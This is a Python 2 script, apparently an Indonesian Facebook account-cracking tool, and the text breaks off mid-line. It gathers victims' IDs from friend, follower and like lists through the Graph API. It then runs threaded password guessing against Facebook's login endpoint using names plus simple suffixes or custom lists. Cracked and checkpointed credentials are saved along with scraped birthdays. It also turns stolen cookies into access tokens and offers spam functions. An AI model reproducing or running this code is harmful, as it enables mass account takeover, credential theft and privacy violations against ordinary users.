# -*- coding: utf-8
# Made With RATU ERROR
# facebook : https://web.facebook.com/hasni.hamunkhantethapmumhun
# facebook unik : https://web.facebook.com/hasni.hamunkhantethapmumhun
# github : https://github.com/RATUCOLMEXS
import os
import sys
import time
import datetime
import random
import hashlib
import re
import threading
import json
import urllib
import cookielib
import requests
import uuid
import ipaddress
import calendar
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from bs4 import BeautifulSoup as par
from time import sleep
from datetime import datetime
from datetime import date
d =3D '\x1b[90;1m'
m =3D '\x1b[91;1m'
h =3D '\x1b[92;1m'
k =3D '\x1b[93;1m'
b =3D '\x1b[94;1m'
j =3D '\x1b[95;1m'
a =3D '\x1b[96;1m'
p =3D '\x1b[97;1m'
R =3D '\033[1;91m'
V =3D '\033[1;95m'
W =3D '\033[1;97m'
G =3D '\033[1;92m'
N =3D '\033[1;0m'
Y =3D '\033[1;93m'
M =3D '\033[1;31m'
H =3D '\033[1;32m'
K =3D '\033[1;33m'
U =3D '\033[1;34m'
P =3D '\033[1;35m'
C =3D '\033[1;36m'
W =3D '\033[1;37m'
A =3D '\033[90m'

def keluar():
    print '\x1b[1;91m[!] Keluar'
    os.sys.exit()

back =3D 0
threads =3D []
berhasil =3D []
cekpoint =3D []
gagal =3D []
idteman =3D []
idfromteman =3D []
idmem =3D []
id =3D []
em =3D []
emfromteman =3D []
hp =3D []
hpfromteman =3D []
reaksi =3D []
reaksigrup =3D []
komen =3D []
komengrup =3D []
listgrup =3D []
vulnot =3D '\x1b[31mNot Vuln'
vuln =3D '\x1b[32mVuln'

try:
	import requests
except ImportError:
	print '[=C3=97] Modul requests belum terinstall!...\n'
	os.system('pip install requests' if os.name =3D=3D 'nt' else 'pip2 instal=
l requests')
reload(sys)
sys.setdefaultencoding('utf8')
ip =3D requests.get('https://api.ipify.org').text

MAX_IPV4 =3D ipaddress.IPv4Address._ALL_ONES  # 2 ** 32 - 1
MAX_IPV6 =3D ipaddress.IPv6Address._ALL_ONES  # 2 ** 128 - 1

def random_ipv4():
	return  ipaddress.IPv4Address._string_from_ip_int(random.randint(0, MAX_I=
PV4))
def random_ipv6():
	return ipaddress.IPv6Address._string_from_ip_int(random.randint(0, MAX_IP=
V6))

def banner():                
	print
	print
	print
	jalan ('                \33[3;1m\033[1;97mW e l c o m e  T o\33[0;1m')
	print
	jalan ('       \033[1;96m[\33[37;1mR\033[1;96m] \033[1;96m[\033[1;97mA\03=
3[1;96m] \033[1;96m[\033[1;97mT\033[1;96m] \033[1;96m[\033[1;97mU\033[1;96m=
]  \033[1;96m[\033[1;97mE\033[1;96m] \033[1;96m[\033[1;97mR\033[1;96m] \033=
[1;96m[\33[37;1mR\033[1;96m] \033[1;96m[\033[1;97mO\033[1;96m] \033[1;96m[\=
033[1;97mR\033[1;96m]\033[1;96m')
	print (' \033[1;96m  ____________________________________________')
	print ('\033[1;97m\033[1;96m =C2=A4\033[1;97m{}{}{}{}{}{}{}{}{}{}{}{}{}{}=
{}{}{}{}{}{}{}{}{}\033[1;96m=C2=A4') 

id =3D []
cp =3D []
ok =3D []
loop =3D 0

ct =3D datetime.now()
n =3D ct.month
bulan1 =3D [    'Januari',   'Februari',    'Maret',    'April',    'Mei',=
    'Juni',    'Juli',    'Agustus',    'September',    'Oktober',    'Nope=
mber',    'Desember']
   
try:
    if n < 0 or n > 12:
        exit()
    nTemp =3D n - 1
except ValueError:
    exit()
    
s =3D requests.Session()
current =3D datetime.now()
ta =3D current.year
bu =3D current.month
ha =3D current.day
op =3D bulan1[nTemp]
reload(sys)
sys.setdefaultencoding('utf-8')
my_date =3D date.today()
hr =3D calendar.day_name[my_date.weekday()]
tanggal =3D ("%s-%s-%s-%s"%(hr, ha, op, ta))
tgl =3D ("%s %s %s"%(ha, op, ta))
bulan =3D {
        "01": "Januari",
        "02": "Februari",
        "03": "Maret",
        "04": "April",
        "05": "Mei",
        "06": "Juni",
        "07": "Juli",
        "08": "Agustus",
        "09": "September",
        "10": "November",
        "11": "Oktober",
        "12": "Desember"
}

mb =3D "https://mbasic.facebook.com"
color =3D lambda col: "\x1b[1;"+str(col)+"m"

def check_in(uid, pw):
	ua =3D "Mozilla/5.0 (SymbianOS/9.3; Series60/3.2 NokiaE5-00/071.003; Prof=
ile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko)=
 NokiaBrowser/7.3.1.26 Mobile Safari/533.4 3gpp-gba"
	ses =3D requests.Session()
	ses.headers.update({
	"Host": "mbasic.facebook.com",
	"cache-control": "max-age=3D0",
	"upgrade-insecure-requests": "1",
	"origin": mb,
	"content-type": "application/x-www-form-urlencoded",
	"user-agent": ua,
	"accept": "text/html,application/xhtml+xml,application/xml;q=3D0.9,image/=
webp,image/apng,*/*;q=3D0.8,application/signed-exchange;v=3Db3;q=3D0.9",
	"x-requested-with": "mark.via.gp",
	"sec-fetch-site": "same-origin",
	"sec-fetch-mode": "navigate",
	"sec-fetch-user": "?1",
	"sec-fetch-dest": "document",
	"referer": mb+"/login/?next&ref=3Ddbl&fl&refid=3D8",
	"accept-encoding": "gzip, deflate",
	"accept-language": "id-ID,id;q=3D0.9,en-US;q=3D0.8,en;q=3D0.7"
	})
	data =3D {}
	ged =3D par(ses.get(mb+"/login/?next&ref=3Ddbl&fl&refid=3D8", headers=3D{=
"user-agent":ua}).text, "html.parser")
	fm =3D ged.find("form",{"method":"post"})
	list =3D ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","=
login","bi_xrwh"]
	for i in fm.find_all("input"):
		if i.get("name") in list:
			data.update({i.get("name"):i.get("value")})
		else:
			continue
	data.update({"email":uid,"pass":pw})
	try:
		run =3D par(ses.post(mb+fm.get("action"), data=3Ddata, allow_redirects=
=3DTrue).text, "html.parser")
	except r.exceptions.TooManyRedirects:
		print(" [!] Redirect overload")
	if "c_user" in ses.cookies:
		print(" [=E2=9C=93] akun ini tidak checkpoint")
	elif "checkpoint" in ses.cookies:
		form =3D run.find("form")
		dtsg =3D form.find("input",{"name":"fb_dtsg"})["value"]
		jzst =3D form.find("input",{"name":"jazoest"})["value"]
		nh   =3D form.find("input",{"name":"nh"})["value"]
		dataD =3D {
			"fb_dtsg": dtsg,
			"fb_dtsg": dtsg,
			"jazoest": jzst,
			"jazoest": jzst,
			"checkpoint_data":"",
			"submit[Continue]":"Lanjutkan",
			"nh": nh
		}
		xnxx =3D par(ses.post(mb+form["action"], data=3DdataD).text, "html.parse=
r")
		ngew =3D [yy.text for yy in xnxx.find_all("option")]
		print(" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m tersedia "+str(len(n=
gew))+" opsi ")
		for opt in range(len(ngew)):
			print" "*3, str(opt+1)+". "+ngew[opt]
	elif "login_error" in str(run):
		oh =3D run.find("div",{"id":"login_error"}).find("div").text
		print(" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m "+oh)
	else:
		print(" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m login gagal, silahka=
n cek kembali id dan password")

def buatngecek():
	print(" \033[1;96m[\033[1;97m?\033[1;96m]\033[1;97m masukan format CP/nam=
afile")
	dirs =3D os.listdir("CP")
	print("")
	for file in dirs:
		print(" \033[1;96m[\033[1;97m=C3=97\033[1;96m]\033[1;97m "+file)
	files =3D raw_input("\n \033[1;96m[\033[1;97m?\033[1;96m]\033[1;96m PILIH=
 FILE \033[1;97m:\033[1;93m ")
	try:
		buka_baju =3D open(files,"r").readlines()
	except FileNotFoundError:
		print(" \033[1;96m[\033[1;97m=C3=97\033[1;96m]\033[1;97m File tidak ada"=
)
		time.sleep(2); main()
	print(" \033[1;96m[\033[1;97m+\033[1;96m]\033[1;96m Total Akun \033[1;97m=
:\033[1;93m "+str(len(buka_baju)))
	print("\033[1;96m=C2=A4"*48)
	for memek in buka_baju:
		kontol =3D memek.replace("\n","")
		titid  =3D kontol.split("|")
		print(" \033[1;96m[\033[1;97m=C3=97\033[1;96m]\033[1;97m check: "+kontol=
)
		try:
			check_in(titid[0], titid[1])
		except requests.exceptions.ConnectionError:
			continue
		print("\033[1;96m=C2=A4"*48)
	print("\033[1;96m=C2=A4"*48)
	print("")
	exit(" \33[3;1m\033[1;97mSelesai.....jangan lupa \33[0;1m\033[1;93mCOLMEX=
's \033[1;97m")
	
def cekakun():
	print'\n \033[1;96m[\033[1;97m1\033[1;96m]\033[1;97m lihat hasil crack \0=
33[1;92mOK '
	print' \033[1;96m[\033[1;97m1\033[1;96m]\033[1;97m lihat hasil crack CP '
	anjg =3D raw_input('\n \033[1;96m[\033[1;97m1\033[1;96m] PILIH\033[1;97m =
: ')
	if anjg =3D=3D '':
		menu()
	elif anjg =3D=3D "1":
		dirs =3D os.listdir("OK")
		print""
		for file in dirs:
			print(" [*] "+file)
		try:
			file =3D raw_input("\n [?] mau lihat hasil yang mana ?: ")
			if file =3D=3D "":
				menu()
			totalok =3D open("OK/%s"%(file)).read().splitlines()
		except IOError:
			exit(" [!] file %s tidak tersedia"%(file))
		nm_file =3D ("%s"%(file)).replace("-", " ")
		del_txt =3D nm_file.replace(".txt", "")
		print("\n *-------------------------------------------------*")
		print(" [+] tanggal : %s -total : %s"%(del_txt, len(totalok)))
		print""
		os.system("cat OK/%s"%(file))
		raw_input("\n [*] tekan ENTER untuk kembali ke menu")
		menu()
	elif anjg =3D=3D "2":
		dirs =3D os.listdir("CP")
		print""
		for file in dirs:
			print(" [*] "+file)
		try:
			file =3D raw_input("\n [?] mau lihat hasil yang mana ?: ")
			if file =3D=3D "":
				menu()
			totalcp =3D open("CP/%s"%(file)).read().splitlines()
		except IOError:
			exit(" [!] file %s tidak tersedia"%(file))
		nm_file =3D ("%s"%(file)).replace("-", " ")
		del_txt =3D nm_file.replace(".txt", "")
		print("\n *-------------------------------------------------*")
		print(" [+] tanggal : %s -total : %s"%(del_txt, len(totalcp)))
		print""
		os.system("cat CP/%s"%(file))
		raw_input("\n\n [*] tekan ENTER untuk kembali ke menu ")
		menu()
	else:
		menu()
		
#------->login token jangan lupa masukin token facebook jangan token listr=
ik kontol<-------#    
def pilihlogin():
	os.system("clear")
	try:
		token =3D open('login.txt','r')
		menu()
	except (KeyError,IOError):
		logo()
		print
		print("\033[1;96m[\033[1;97m01\033[1;96m] \033[1;97mLogin via TOKEN")
		print("\033[1;96m[\033[1;97m02\033[1;96m] \033[1;97mLogin via COOKIE")
		bct =3D raw_input("\n[?] pilih : ")
		if bct =3D=3D "":
			pilihlogin()
		elif bct =3D=3D "1":
			tokenz()
		elif bct =3D=3D "2":
			gen()

def gen():
	os.system('clear')
	logo()
	print
	cookie =3D raw_input(" \033[1;97m[\033[1;96m+[\033[1;97m] \033[1;96mMasuk=
an Cookies \033[1;97m: ")
	try:
		data =3D requests.get('https://m.facebook.com/composer/ocelot/async_load=
er/?publisher=3Dfeed#_=3D_', headers =3D {
		'user-agent'                : 'Mozilla/5.0 (Linux; Android 8.1.0; MI 8 B=
uild/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.34=
97.86 Mobile Safari/537.36', # Jangan Di Ganti Ea Anjink.
		'referer'                   : 'https://m.facebook.com/',
		'host'                      : 'm.facebook.com',
		'origin'                    : 'https://m.facebook.com',
		'upgrade-insecure-requests' : '1',
		'accept-language'           : 'id-ID,id;q=3D0.9,en-US;q=3D0.8,en;q=3D0.7=
',
		'cache-control'             : 'max-age=3D0',
		'accept'                    : 'text/html,application/xhtml+xml,applicati=
on/xml;q=3D0.9,image/webp,image/apng,*/*;q=3D0.8',
		'content-type'              : 'text/html; charset=3Dutf-8'
		}, cookies =3D {
		'cookie'                    : cookie
		})
		find_token =3D re.search('(EAAA\w+)', data.text)
		hasil    =3D " \033[0;97m[\033[0;91m!\033[0;97m] Your Cookie Invalid" if=
 (find_token is None) else '\n* Your fb access token : ' + find_token.group=
(1)
	except requests.exceptions.ConnectionError:
		print(' \033[0;97m[\033[0;91m!\033[0;97m] No Connection')
	cookie =3D open("login.txt", 'w')
	cookie.write(find_token.group(1))
	cookie.close()
	menu()
                            
def tokenz():
	os.system('clear')
	try:
		token =3D open('login.txt', 'r')
		menu()
	except (KeyError, IOError):
		os.system('clear')
		print
		logo()
		token =3D raw_input('\n\033[1;97m [\033[1;96m+\033[1;97m] \033[1;96mMasu=
kkan Token \033[1;97m: ')
		try:
			otw =3D requests.get('https://graph.facebook.com/me?access_token=3D'+to=
ken)
			a =3D json.loads(otw.text)
			zedd =3D open('login.txt', 'w')
			zedd.write(token)
			zedd.close()
			menu()
		except KeyError:
			print("[!] Token Invalid!")
			sys.exit()

def xxnx():
    try:
        toket =3D open('licensed.log', 'r').read()
    except IOError:
        print '\x1b[1;91m License Invalid !'
        os.system('clear')
        os.system('rm -rf licensed.log')
        lisen()

    if os.path.exists('licensed.log'):
        user1()
    else:
        lisen()

useragents =3D 'Mozilla/5.0 (Linux; Android 6.0.1; MotoG3-TE Build/MPDS24.=
107-56-1-21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mob=
ile Safari/537.36'
#------->menu crack india<-------#
def menu():
	os.system('clear')
	global token
	try:
		token =3D open('login.txt','r').read()
		otw =3D requests.get('https://graph.facebook.com/me/?access_token=3D'+to=
ken)
		a =3D json.loads(otw.text)
		nama =3D a['name']
		id =3D a['id']
	except KeyError:
		os.system('clear')
		print (' [!] Token Invalid')
		os.system("rm -f login.txt")
		menu()
	except requests.exceptions.ConnectionError:
		print ('  [!] Tidak Ada Koneksi')
		sys.exit()
		    
	banner()
	print
	print
	jalan (' \33[3;1m\033[1;97mSelamat datang.....\33[0;1m')
	
	print
	print" \033[1;96m[\033[1;97m01\033[1;96m] \033[1;97mCrack dari ID publik"
	print" \033[1;96m[\033[1;97m02\033[1;96m] \033[1;97mCrack dari ID followe=
rs"
	print" \033[1;96m[\033[1;97m03\033[1;96m] \033[1;97mCrack dari likes post=
ingan publik"
	print" \033[1;96m[\033[1;97m04\033[1;96m] \033[1;97mCrack metode brutefor=
ce (\033[1;96mbelum tersedia\033[1;97m)"
	print" \033[1;96m[\033[1;97m05\033[1;96m] \033[1;97mCek hasil crack"
	print" \033[1;96m[\033[1;97m06\033[1;96m] \033[1;97mCek konfirmasi identi=
tas account facebook"
	print" \033[1;96m[\033[1;97m07\033[1;96m] \033[1;97mCek ID"
	print" \033[1;96m[\033[1;97m08\033[1;96m] \033[1;97mCek biodata pengguna =
account facebook"
	print" \033[1;96m[\033[1;97m09\033[1;96m] \033[1;97mBot reaction"
	print" \033[1;96m[\033[1;97m10\033[1;96m] \033[1;97mSpam unlimited "
	print" \033[1;97m[\033[1;96m00\033[1;97m] \033[1;96mRemove TOKEN/COOKIE"
	print
	pilih_india()

def pilih_india():
	ask =3D raw_input(" \033[1;96m[\033[1;97m?\033[1;96m] \033[1;96mPILIH \03=
3[1;97m:\033[1;93m ")
	if ask =3D=3D "":
		print
		print ("\033[1;97mpilih yang benar.......!!!") 
		exit()
	elif ask =3D=3D "1" or ask =3D=3D "01":
		print ("\n \033[1;97mketik '\33[3;1m\033[1;96mme\033[1;97m' \33[0;1mjika=
 ingin crack dari daftar pencarian teman")
		print
		idt =3D raw_input(" \033[1;96m[\033[1;97m?\033[1;96m] \033[1;97mid publi=
k :\033[1;93m ")
		try:
			pok =3D requests.get("https://graph.facebook.com/"+idt+"?access_token=
=3D"+token)
			sp =3D json.loads(pok.text)
			print (" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m nama      :\033[1;=
93m "+sp["name"]) 
		except KeyError:
			print ("     \033[1;97mmaaf id tidak publik") 
			exit()
		r =3D requests.get("https://graph.facebook.com/"+idt+"/friends?access_to=
ken=3D"+token)
		z =3D json.loads(r.text)
		for i in z["data"]:
			uid =3D i['id']
			na =3D i['name']
			nm =3D na.rsplit(" ")[0]
			id.append(uid+'|'+nm)
	elif ask =3D=3D "2" or ask =3D=3D "02":
		print ("\n \033[1;97mketik '\33[3;1m\033[1;96mme\033[1;97m' \33[0;1mjika=
 ingin crack dari daftar pencarian teman")
		print
		idt =3D raw_input(" \033[1;96m[\033[1;97m?\033[1;96m] \033[1;97mid publi=
k :\033[1;93m ")
		try:
			pok =3D requests.get("https://graph.facebook.com/"+idt+"?access_token=
=3D"+token)
			sp =3D json.loads(pok.text)
			print (" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m nama      :\033[1;=
93m "+sp["name"]) 
		except KeyError:
			print ("     \033[1;97mmaaf id tidak publik") 
			exit()
		r =3D requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=
=3D999999&access_token=3D"+token)
		z =3D json.loads(r.text)
		for i in z["data"]:
			uid =3D i['id']
			na =3D i['name']
			nm =3D na.rsplit(" ")[0]
			id.append(uid+'|'+nm)
	elif ask =3D=3D "3" or ask =3D=3D "03":
		idt =3D raw_input(" \033[1;96m[\033[1;97m?\033[1;96m] \033[1;97mid publi=
k :\033[1;93m ")
		r =3D requests.get("https://graph.facebook.com/"+idt+"/likes?limit=3D999=
9999&access_token=3D"+token)
		z =3D json.loads(r.text)
		for i in z['data']:
			uid =3D i['id']
			na =3D i['name']
			nm =3D na.rsplit(" ")[0]
			id.append(uid+'|'+nm)
	elif ask =3D=3D "4" or ask =3D=3D "04":
		menu_hack()	    
	elif ask =3D=3D "5" or ask =3D=3D "05":
		print
		print" \033[1;96m[\033[1;97m1\033[1;96m]\033[1;97m lihat hasil \033[1;97=
m[\033[1;96mOK\033[1;97m]"
		print" \033[1;96m[\033[1;97m2\033[1;96m]\033[1;97m lihat hasil \033[1;96=
m[\033[1;97mCP\033[1;96m]"
		ress =3D raw_input(" \033[1;96m[\033[1;97m?\033[1;96m]\033[1;96m pilih \=
033[1;96m:\033[1;93m ")
		if ress =3D=3D"":
			menu()
		elif ress =3D=3D "1" or ress =3D=3D "01":
			print ("\n [+] hasil \033[1;97[\033[1;96mOK\033[1;97]\033[1;97m tanggal=
 : \033[1;96m%s-%s-%s\033[0;97m" % (ha, op, ta)) 
			os.system("cat out/OK-%s-%s-%s.txt" % (ha, op, ta))
			exit()
		elif ress =3D=3D "2" or ress =3D=3D "02":
			print (" [+] hasil \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m tanggal=
 : \033[1;96m%s-%s-%s\033[0;97m" % (ha, op, ta)) 
			os.system("cat out/CP-%s-%s-%s.txt" % (ha, op, ta))
			exit()
	elif ask =3D=3D "6" or ask =3D=3D "06":
		buatngecek()
	elif ask =3D=3D "7" or ask =3D=3D "07":
		print
		print("\033[1;96m [\033[1;97m1\033[1;96m]\033[1;97m Cek ID teman ")
		print("\033[1;96m [\033[1;97m2\033[1;96m]\033[1;97m Cek ID publik ")
		d =3D raw_input("\n\033[1;96m [\033[1;97m?\033[1;96m] \033[1;96mpilih \0=
33[1;96m:\033[1;93m ")
		if d =3D=3D'': 
			exit()
		elif d in['1','01']:
			id_teman1()
		elif d in['2','02']:
			idfrom_teman1()
		else:
			print ("\033[1;97mpilih yang benar.......!!!") 
			exit()
	elif ask =3D=3D "8" or ask =3D=3D "08":
		informasi()
	elif ask =3D=3D "9" or ask =3D=3D "09":
		 menu_bot()
	elif ask =3D=3D "10" or ask =3D=3D "10":
		menu_spam()
	elif ask =3D=3D "0" or ask =3D=3D "00":
		os.system("rm -f login.txt") 
		print (" =E2=88=9A   berhasil menghapus token") 
		exit()		
		
	else:
		print ("\033[1;97mpilih yang benar.......!!!") 
		exit()
	
	print"\033[1;96m [\033[1;97m!\033[1;96m]\033[1;97m total id  :\033[1;93m =
" +str(len(id))
	ask =3D raw_input("\n \033[1;96m[\033[1;97m?\033[1;96m]\033[1;97m ingin g=
unakan password manual (\033[1;92my\033[1;97m/\033[1;93mt\033[1;97m) : ")
	if ask =3D=3D "Y" or ask =3D=3D "y":
		manual()
	print
	print (" \033[1;97mmainkan data mode pesawat")
	print (" \033[1;97mdi angka \033[1;96m100 \033[1;97mdan \033[1;96m2000 \0=
33[1;97msaat menjalankan crack")
	print(" \033[1;97mProses crack \33[3;1m\033[1;92msedang berjalan...\33[0;=
1m")
	print

	def main(arg):
		global ok,cp,ua, loop
		print '\r \033[1;97m=C2=A4  %s/%s \033[1;97m[\033[1;96mOK:%s\033[1;97m] =
- \033[1;96m[\033[1;97mCP:%s\033[1;96m]\033[1;97m ' % (loop, len(id), len(o=
k), len(cp)),
		sys.stdout.flush()
		user =3D arg
		uid,name=3Duser.split("|") 
		try:
			os.mkdir('out')
		except OSError:
			pass
		try:
			for pw in [name.lower()+'123',name.lower()+'12345']:
				ua =3D random.choice(["Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaC=
6-00/40.0.021; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (=
KHTML, like Gecko) NokiaBrowser/7.3.1.25 3gpp-gba"])
				headers_ =3D {'x-fb-connection-bandwidth': str(random.randint(20000000=
.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 
				'x-fb-net-hni': str(random.randint(20000, 40000)), 
				'x-fb-connection-quality': 'EXCELLENT', 
				'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 
				'user-agent': ua, 
				'content-type': 'application/x-www-form-urlencoded', 
				'x-fb-http-engine': 'Liger'}
				ses=3Drequests.Session()
				api=3D"https://b-api.facebook.com/method/auth.login"
				param=3D{"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4=
a32","format": "JSON","sdk_version": "2","email":uid,"locale": "en_US","pas=
sword":pw,"sdk": "ios","generate_session_cookies": "1","sig": "3f555f99fb61=
fcd7aa0c44f58f522ef6"}
				send=3Dses.get(api,params=3Dparam, headers=3Dheaders_)
				if "access_token" in send.text and "EAAA" in send.text:
					print '\r\033[1;97m =F0=9F=91=89 \033[1;97m[\033[1;96mOK\033[1;97m]\0=
33[1;96m\033[1;96m ' +uid+ ' \033[1;97m=E2=97=8A\033[1;96m ' +pw+ '        =
'
					ok.append(uid+' =E2=80=A2 '+pw)
					save =3D open('out/OK-%s-%s-%s.txt' % (ha, op, ta),'a') 
					save.write('\033[1;97m =F0=9F=91=89 \033[1;97m[\033[1;96mOK\033[1;97m=
]\033[1;96m\033[1;96m '+str(uid)+' \033[1;97m=E2=97=8A\033[1;96m '+str(pw)+=
'\n')
					save.close()
					break
					continue
					continue
				elif "www.facebook.com" in send.json()["error_msg"]:
					try:
						token =3D open('login.txt').read()
						url =3D ("https://graph.facebook.com/"+uid+"?access_token=3D"+token)
						data =3D s.get(url).json()
						nama =3D data['name']
						ttl =3D data['birthday'].replace("/","-")
						print('\r\033[0;97m =F0=9F=91=89 \033[1;96m[\033[1;97mCP\033[1;96m]\=
033[1;97m\033[1;97m ' +uid+ ' \033[1;96m=E2=97=8A\033[1;97m ' + pw + ' \033=
[1;96m=E2=97=8A\033[1;97m ' + ttl)
						cp.append(uid+'|'+pw+'|'+ttl)
						save =3D open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
						save.write('\033[0;97m =F0=9F=91=89 \033[1;96m[\033[1;97mCP\033[1;96=
m]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m=E2=97=8A\033[1;97m '+str(pw)=
+' \033[1;96m=E2=97=8A\033[1;97m '+ttl+'\n')
						open("CP/%s.txt"%(tanggal),"a").write("%s|%s|%s\n"%(uid, pw, ttl))
						save.close()
						break
					except(KeyError, IOError):
						ttl =3D ' '
					except:pass
					print '\r\033[0;97m =F0=9F=91=89 \033[1;96m[\033[1;97mCP\033[1;96m]\0=
33[1;97m\033[1;97m ' +uid+ ' \033[1;96m=E2=97=8A\033[1;97m ' + pw + '      =
  '
					cp.append(uid+'|'+pw)
					save =3D open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
					save.write('\033[0;97m =F0=9F=91=89 \033[1;96m[\033[1;97mCP\033[1;96m=
]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m=E2=97=8A\033[1;97m '+str(pw)+=
'\n')
					open("CP/%s.txt"%(tanggal),"a").write(" %s|%s\n"%(uid, pw))
					save.close()
					break
					continue
			
			loop +=3D 1
		except:
			pass
	p =3D ThreadPool(30)
	p.map(main, id)
	print("\n crack selesai...")
	print
	print
	exit()

def manual():
	print("\033[1;96m [\033[1;97m*\033[1;96m] \033[1;97mcontoh password : ban=
gladesh,102030,786786")
	pw =3D raw_input("\033[1;96m [\033[1;97m!\033[1;96m]\033[1;97m set passwo=
rd :\033[1;93m ").split(",")
	print
	if len(pw) =3D=3D0:
		exit(" *  isi yang bener, tidak boleh kosong")
	print("\033[1;97m jumlah password yang di buat : \033[1;93m" +str(len(pw)=
))
	print (" \033[1;97mmainkan data mode pesawat")
	print (" \033[1;97mdi angka \033[1;96m100 \033[1;97mdan \033[1;96m2000 \0=
33[1;97msaat menjalankan crack")
	print(" \033[1;97mProses crack \33[3;1m\033[1;92msedang berjalan...\33[0;=
1m")
	print
	
	def main(arg):
		global ok,cp,ua,loop
		print '\r \033[1;97m=C2=A4  %s/%s \033[1;97m[\033[1;96mOK:%s\033[1;97m] =
- \033[1;96m[\033[1;97mCP:%s\033[1;96m]\033[1;97m ' % (loop, len(id), len(o=
k), len(cp)),
		sys.stdout.flush()
		user =3D arg
		uid,name=3Duser.split("|") 
		try:
			os.mkdir('out')
		except OSError:
			pass
		try:
			for asu in pw:
				ua =3D 'Mozilla/5.0 (Series40; NokiaC2-02/06.96; Profile/MIDP-2.1 Conf=
iguration/CLDC-1.1) Gecko/20100401 S40OviBrowser/5.0.0.0.31'
				headers_ =3D {'x-fb-connection-bandwidth': str(random.randint(20000000=
.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 
				'x-fb-net-hni': str(random.randint(20000, 40000)), 
				'x-fb-connection-quality': 'EXCELLENT', 
				'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 
				'user-agent': ua, 
				'content-type': 'application/x-www-form-urlencoded', 
				'x-fb-http-engine': 'Liger'}
				ses=3Drequests.Session()
				api=3D"https://b-api.facebook.com/method/auth.login"
				param=3D{"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4=
a32","format": "JSON","sdk_version": "2","email":uid,"locale": "en_US","pas=
sword":asu,"sdk": "ios","generate_session_cookies": "1","sig": "3f555f99fb6=
1fcd7aa0c44f58f522ef6"}
				send=3Dses.get(api,params=3Dparam, headers=3Dheaders_)
				if "access_token" in send.text and "EAAA" in send.text:
					print '\r\033[1;97m =F0=9F=91=89 \033[1;97m[\033[1;96mOK\033[1;97m]\0=
33[1;96m\033[1;96m ' +uid+ ' \033[1;97m=E2=97=8A\033[1;92m ' + asu + '     =
   '
					ok.append(uid+' =E2=80=A2 '+asu)
					save =3D open('out/OK-%s-%s-%s.txt' % (ha, op, ta),'a') 
					save.write('\r\033[1;97m =F0=9F=91=89 \033[1;97m[\033[1;96mOK\033[1;9=
7m]\033[1;96m\033[1;96m '+str(uid)+' \033[1;97m=E2=97=8A\033[1;96m '+str(as=
u)+'\n')
					save.close()
					break
					continue
					continue
				elif "www.facebook.com" in send.json()["error_msg"]:
					try:
						token =3D open('login.txt').read()
						url =3D ("https://graph.facebook.com/"+uid+"?access_token=3D"+token)
						data =3D s.get(url).json()
						nama =3D data['name']
						ttl =3D data['birthday'].replace("/","-")
						print('\r\033[1;97m =F0=9F=91=89 \033[1;96m[\033[1;97mCP\033[1;96m]\=
033[1;97m\033[1;97m ' +uid+ ' \033[1;96m=E2=97=8A\033[1;97m ' + asu + ' \03=
3[1;96m=E2=97=8A\033[1;97m ' + ttl)
						cp.append(uid+'|'+asu+'|'+ttl)
						save =3D open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
						save.write('\033[1;97m =F0=9F=91=89 \033[1;96m[\033[1;97mCP\033[1;96=
m]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m=E2=97=8A\033[1;97m '+str(pw)=
+'\n')
						open("CP/%s.txt"%(tanggal),"a").write("%s|%s|%s\n"%(uid, asu, ttl))
						save.close()
						break
					except(KeyError, IOError):
						ttl =3D ' '
					except:pass
					print '\r\033[1;97m =F0=9F=91=89 \033[1;96m[\033[1;97mCP\033[1;96m]\0=
33[1;97m\033[1;97m ' +uid+ ' \033[1;96m=E2=97=8A\033[1;97m ' + asu + '     =
   '
					cp.append(uid+'|'+asu)
					save =3D open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
					save.write('\033[1;97m =F0=9F=91=89 \033[1;96m[\033[1;97mCP\033[1;96m=
]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m=E2=97=8A\033[1;97m '+str(pw)+=
'\n')
					open("CP/%s.txt"%(tanggal),"a").write(" %s|%s\n"%(uid, asu))
					save.close()
					break
					continue
			
			loop +=3D 1
		except:
			pass
	p =3D ThreadPool(30)
	p.map(main, id)
	print("\n crack selesai...")
	print
	print
	exit()

def buat_folder():
	try:os.mkdir("CP")
	except:pass
	try:os.mkdir("OK")
	except:pass

def jalan(z):
    for e in z + '\n':
        sys.stdout.write(e)
        sys.stdout.flush()
        time.sleep(0.03)

back =3D 0
threads =3D []
id =3D []
idteman =3D []
idfromteman =3D []
	
def id_teman1():
    try:
        toket =3D open('login.txt', 'r').read()
    except IOError:
        print ' Token invalid'
        os.system('rm -rf login.txt')
        time.sleep(0.01)
        masuk()

    try:
        os.mkdir('out')
    except OSError:
        pass

    try:
        os.system('clear')
        print
	print
        r =3D requests.get('https://graph.facebook.com/me/friends?access_t=
oken=3D' + toket)
        z =3D json.loads(r.text)
        print('\033[1;96m[\033[1;97m!\033[1;96m] \033[1;97mMENGAMBIL SEMUA=
 \033[1;96mID \033[1;97mTEMAN')
	print('\033[1;97mjika ingin berhenti mengambil ID tekan \033[1;95mctrl \0=
